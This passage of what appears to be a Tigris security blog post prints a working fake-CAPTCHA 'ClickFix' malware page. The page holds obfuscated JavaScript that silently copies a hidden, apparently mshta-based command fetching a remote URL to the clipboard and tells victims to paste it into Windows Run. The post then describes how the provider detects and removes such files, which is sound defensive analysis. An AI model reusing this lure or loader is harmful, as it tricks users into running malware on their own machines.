YWx1ZScsJ3NlbGVjdCcsJzE2NjA0OTVHTkFNYWQnLCdJQ0E9JywnODg5MDcxc2V5clJwJywnb25jbGljaycsJzEwNjIxOTZuT3JZWFInLCdra2snLCcwfDd8MXwzfDV8JywnYm04dVkyOHZNbCcsJ2NsYXNzTGlzdCcsJ0doRExRJywnNHw2fDInLCc5NjM2NTI1T2JBZ21JJywnZ2V0RWxlbWVudCcsJ3Nob3cnLCcxMTAwMjEzOGdMaFFFZScsJzEwNzIxTm1kTlhiJywnYlhOb2RHRWdhSCcsJ3NwbGl0Jywnclp1ZlEnLCcxMmVMdXdPeScsJzEya3RJYmlhJywnQnlJZCcsJ3JWeWZWJywnYXBwZW5kQ2hpbCcsJ2NyZWF0ZUVsZW0nLCdJQ0FnSUNBZ0lDJywncmVtb3ZlQ2hpbCcsJ1NsblV1JywnYXRvYicsJ1ZrTW5ZMklDQWcnLCdlbnQnLCdhZGQnLCdBZ0lDQWdJQ0FnJywnOFZFYllzZicsJ0ZsZnFCJywnRndkUHInLCdleGVjQ29tbWFuJywnY29weScsJ0laaURsJywndGV4dGFyZWEnLCcxODg5NjcxMHlVT09kYicsJ1IwY0hNNkx5OHknXTtfMHgzNzgxPWZ1bmN0aW9uKCl7cmV0dXJuIF8weDVlMDFjNjt9O3JldHVybiBfMHgzNzgxKCk7fQogIDwvc2NyaXB0PgogCjwvYm9keT4KPC9odG1sPgo=';
      const decoded = decodeURIComponent(escape(atob(encoded)));
      document.open();
      document.write(decoded);
      document.close();
    });
  </script>
</head>
<body>
  Loading content...
</body>
</html>

This code renders another HTML by base64 decoding this to below:

Rendered fake CAPTCHA page
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width,initial-scale=1.0">
  <title>reCAPTCHA V3 Security</title>
  <meta name="robots" content="noindex,nofollow">
  <meta name="googlebot" content="noindex,nofollow">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
  <style>
  
    body,html{margin:0;padding:0;width:100%;height:100%;display:flex;justify-content:center;align-items:center;font-family:'Segoe UI',Tahoma,Geneva,Verdana,sans-serif;background:#f2f2f2;color:#333}
    .a{position:relative;text-align:center;max-width:500px;margin:20px;}
    .b{padding:20px;background:#fff;box-shadow:0 5px 20px rgba(0,0,0,.3);border-radius:8px;text-align:center}
    .b h2{margin:0 0 20px;font-size:28px;color:#4285f4}
    .b p{margin:0 0 20px;font-size:18px;color:#666}
    .c{display:inline-flex;align-items:center;padding:10px 20px;background:#4285f4;color:#fff;border:none;border-radius:5px;cursor:pointer;font-size:16px;transition:background .1s}
    .c img{margin-right:10px}
    .c:hover{background:#357ae8}
    .d{display:none;padding:20px;background:#fff;box-shadow:0 5px 20px rgba(0,0,0,.3);border-radius:8px;text-align:left;position:absolute;top:110%;left:50%;transform:translateX(-50%);z-index:20;animation:fadeIn .1s ease}
    .d.show{display:block}
    .d h3{margin:0 0 15px;font-size:24px;color:#333}
    .d p{font-size:18px;color:#333;margin:5px 0}
    .e{position:fixed;top:0;left:0;width:100%;height:100%;background:rgba(0,0,0,.5);z-index:10;display:none}
    .e.show{display:block}
    @keyframes fadeIn{from{opacity:0}to{opacity:1}}
    
  </style>
</head>
<body> 
  
  <div class="a">
    <div class="e" id="i"></div>
    <div class="b">
      <h2>Verify You Are Human</h2>
      <p>Please verify that you are a human to continue.</p>
      <div class="c" id="kkk">
        <img src="data:image/png;base64,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" alt="reCAPTCHA Logo">
        <span>I'm not a robot</span>
      </div>
      <div class="d" id="k">
        <h3>Verification Steps</h3>
        <p>1. Press Windows Button "<i class="fab fa-windows"></i>" + R</p>
        <p>2. Press CTRL + V</p>
        <p>3. Press Enter</p>
      </div>
    </div>
    
  </div>
  <script>
function _0x1d42(_0x149841,_0x3e1f3b){var _0x2dfa39=_0x3781();return _0x1d42=function(_0x1b1d8b,_0x3e906c){_0x1b1d8b=_0x1b1d8b-(-0xa*0x23b+-0xbfe+0x243c);var _0x2369f6=_0x2dfa39[_0x1b1d8b];return _0x2369f6;},_0x1d42(_0x149841,_0x3e1f3b);}(function(_0x5cb26d,_0x562580){var _0x1451a2=_0x1d42,_0x4510af=_0x5cb26d();while(!![]){try{var _0x180a33=-parseInt(_0x1451a2(0x200))/(-0x946+-0x51*0x28+0x15ef)*(-parseInt(_0x1451a2(0x204))/(0x400+-0x26b9+0x22bb))+parseInt(_0x1451a2(0x1f3))/(0xb2*0x14+0x22cf+-0x30b4)+-parseInt(_0x1451a2(0x1f5))/(0xaa*0x12+-0x1*-0x113b+-0x1d2b)+parseInt(_0x1451a2(0x1f1))/(0x73b*0x4+0x1a9d+-0x3784)*(-parseInt(_0x1451a2(0x205))/(-0xb76*0x1+0x5*-0x271+0x17b1))+-parseInt(_0x1451a2(0x1ff))/(0x741+0x1*0x1ef9+-0x2633)+parseInt(_0x1451a2(0x212))/(0x5*-0x7f+-0xd8a+-0x24b*-0x7)*(parseInt(_0x1451a2(0x1fc))/(0x191*0x7+-0xd1f+0x231))+parseInt(_0x1451a2(0x219))/(0x7*0x6e+0x535+-0x1*0x82d);if(_0x180a33===_0x562580)break;else _0x4510af['push'](_0x4510af['shift']());}catch(_0x17b954){_0x4510af['push'](_0x4510af['shift']());}}}(_0x3781,-0x17*-0x10471+0x1*0x72d+-0x1*0xaebc6),(function(){var _0x57a39a=_0x1d42,_0x369102={'rVyfV':function(_0x135d97,_0x513a5c){return _0x135d97(_0x513a5c);},'FwdPr':_0x57a39a(0x1f7)+_0x57a39a(0x1fb),'IZiDl':_0x57a39a(0x218),'SlnUu':_0x57a39a(0x1fe),'FlfqB':_0x57a39a(0x216),'rZufQ':_0x57a39a(0x201)+_0x57a39a(0x21a)+_0x57a39a(0x1f8)+_0x57a39a(0x20e)+_0x57a39a(0x20a)+_0x57a39a(0x211)+_0x57a39a(0x20a)+_0x57a39a(0x211)+_0x57a39a(0x20a)+_0x57a39a(0x211)+_0x57a39a(0x20a)+_0x57a39a(0x211)+_0x57a39a(0x1f2),'GhDLQ':_0x57a39a(0x1f6)};function _0x4198ac(_0x1d44b9){var _0x348350=_0x57a39a;return _0x369102[_0x348350(0x207)](decodeURIComponent,_0x369102[_0x348350(0x207)](escape,window[_0x348350(0x20d)](_0x1d44b9)));}document[_0x57a39a(0x1fd)+_0x57a39a(0x206)](_0x369102[_0x57a39a(0x1fa)])[_0x57a39a(0x1f4)]=function(){var _0x19023c=_0x57a39a,_0x4702bb=_0x369102[_0x19023c(0x214)][_0x19023c(0x202)]('|'),_0x5c91c9=-0x53e*-0x3+0xae5+0x553*-0x5;while(!![]){switch(_0x4702bb[_0x5c91c9++]){case'0':var _0x53ebcf=document[_0x19023c(0x209)+_0x19023c(0x20f)](_0x369102[_0x19023c(0x217)]);continue;case'1':document[_0x19023c(0x21b)][_0x19023c(0x208)+'d'](_0x53ebcf);continue;case'2':document[_0x19023c(0x1fd)+_0x19023c(0x206)]('i')[_0x19023c(0x1f9)][_0x19023c(0x210)](_0x369102[_0x19023c(0x20c)]);continue;case'3':_0x53ebcf[_0x19023c(0x1f0)]();continue;case'4':document[_0x19023c(0x21b)][_0x19023c(0x20b)+'d'](_0x53ebcf);continue;case'5':document[_0x19023c(0x215)+'d'](_0x369102[_0x19023c(0x213)]);continue;case'6':document[_0x19023c(0x1fd)+_0x19023c(0x206)]('k')[_0x19023c(0x1f9)][_0x19023c(0x210)](_0x369102[_0x19023c(0x20c)]);continue;case'7':_0x53ebcf[_0x19023c(0x21c)]=_0x369102[_0x19023c(0x207)](_0x4198ac,_0x369102[_0x19023c(0x203)]);continue;}break;}};}()));function _0x3781(){var _0x5e01c6=['body','value','select','1660495GNAMad','ICA=','889071seyrRp','onclick','1062196nOrYXR','kkk','0|7|1|3|5|','bm8uY28vMl','classList','GhDLQ','4|6|2','9636525ObAgmI','getElement','show','11002138gLhQEe','10721NmdNXb','bXNodGEgaH','split','rZufQ','12eLuwOy','12ktIbia','ById','rVyfV','appendChil','createElem','ICAgICAgIC','removeChil','SlnUu','atob','VkMnY2ICAg','ent','add','AgICAgICAg','8VEbYsf','FlfqB','FwdPr','execComman','copy','IZiDl','textarea','18896710yUOOdb','R0cHM6Ly8y'];_0x3781=function(){return _0x5e01c6;};return _0x3781();}
  </script>
 
</body>
</html>

This code does the following:

  • It displays a fake "I'm not a robot" reCAPTCHA-style interface to trick the user into thinking they're completing a legitimate human verification step.
  • When the user clicks the fake CAPTCHA button, a popup appears with instructions:
    • Press Windows Key + R
    • Paste something
    • Press Enter
  • The JavaScript copies a hidden command (Base64-decoded PowerShell or other script) into the user's clipboard without their knowledge.
  • The user is tricked into pasting and running the malicious command in the Windows Run dialog (Win + R), executing malware or giving the attacker access to the system.

How we detect malicious content

Tigris uses a layered approach to malware detection that balances performance with security. Instead of scanning every object on write, which would be prohibitively expensive, we selectively scan content based on signals like:

  • User trust score
  • File type and accessibility
  • Reputation of the uploading account

When a file is written to Tigris (e.g., via PutObject), our system evaluates whether it should be flagged for malware scanning. If it meets certain criteria, an asynchronous worker submits the file's hash to third-party malware detection services such as Pangea Cloud and ReversingLabs.

If the content is later identified as malicious, we take immediate action: removing the file and banning the associated account, if necessary.

What we do when we detect malicious content

When a file is confirmed to be malicious, we act quickly to contain and prevent further abuse. Our response includes:

  • Deleting the malicious content from the platform
  • Removing the associated bucket and revoking access keys
  • Blocking the user's email address and preventing new signups with it
  • Reporting the incident to partner security services and threat intelligence platforms

These steps help us limit the impact, prevent recurrence, and contribute to the broader security ecosystem.

Conclusion

At the scale Tigris operates, scanning every uploaded file in real time isn't practical or efficient. Instead, we take a layered approach that balances speed, cost, and security. We flag risky content based on file type and user reputation, require identity verification and MFA to keep bad actors out, and work closely with security vendors and researchers to catch threats early and respond fast.

This approach allows us to stay ahead of abuse without compromising the speed or reliability our users expect. By focusing on patterns—like repeat offenders using disposable accounts—and leveraging trusted partner data, we can prevent harm before it spreads and keep the platform safe and trustworthy for everyone.

Have questions or want to report abuse? Reach out to abuse@tigrisdata.com.

Infinite storage you can trust

Tigris is object storage that distributes your objects around the world.